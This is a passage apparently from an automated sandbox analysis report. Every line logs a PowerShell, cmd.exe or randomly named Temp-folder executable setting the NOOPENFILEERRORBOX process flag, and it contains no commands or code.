                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
